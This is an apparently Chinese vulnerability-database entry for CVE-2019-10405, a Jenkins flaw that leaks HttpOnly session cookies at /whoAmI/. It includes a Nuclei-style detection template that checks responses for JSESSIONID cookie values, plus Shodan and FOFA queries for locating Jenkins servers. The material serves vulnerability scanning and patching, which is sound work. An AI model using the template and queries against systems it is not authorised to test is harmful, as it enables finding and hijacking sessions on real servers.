CVE-2019-10405: Jenkins <=2.196 - Cookie Exposure

日期: 2025-08-01 | 影响软件: Jenkins | POC: 已公开

漏洞描述

Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue.

PoC代码[已公开]

id: CVE-2019-10405

info:
  name: Jenkins <=2.196 - Cookie Exposure
  author: c-sh0
  severity: medium
  description: Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue.
  impact: |
    The exposure of cookies can lead to session hijacking, unauthorized access, and potential data breaches.
  remediation: |
    Upgrade Jenkins to a version higher than 2.196 to mitigate the vulnerability.
  reference:
    - https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
    - http://www.openwall.com/lists/oss-security/2019/09/25/3
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10405
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2019-10405
    cwe-id: CWE-79
    epss-score: 0.78751
    epss-percentile: 0.99016
    cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
  metadata:
    max-request: 2
    vendor: jenkins
    product: jenkins
    shodan-query:
      - http.favicon.hash:81586312
      - cpe:"cpe:2.3:a:jenkins:jenkins"
      - product:"jenkins"
    fofa-query: icon_hash=81586312
  tags: cve,cve2019,jenkins

http:
  - raw:
      - |
        GET {{BaseURL}}/whoAmI/ HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{BaseURL}}/whoAmI/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'text/html'
          - 'x-jenkins'
        case-insensitive: true
        condition: and

      - type: word
        part: body_2
        words:
          - 'Cookie'
          - 'JSESSIONID'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - x_jenkins
# digest: 4a0a0047304502207ba7c0728cc52f6728eedda9cba94429d7e474e9f1fdbe294abf3380194f61e80221008019df4d6236cfd61bef8c2eb011c87dde09164a38d21c116ca3cb3770bb7080:922c64590222798bb761d5b6d8e72950

相关漏洞推荐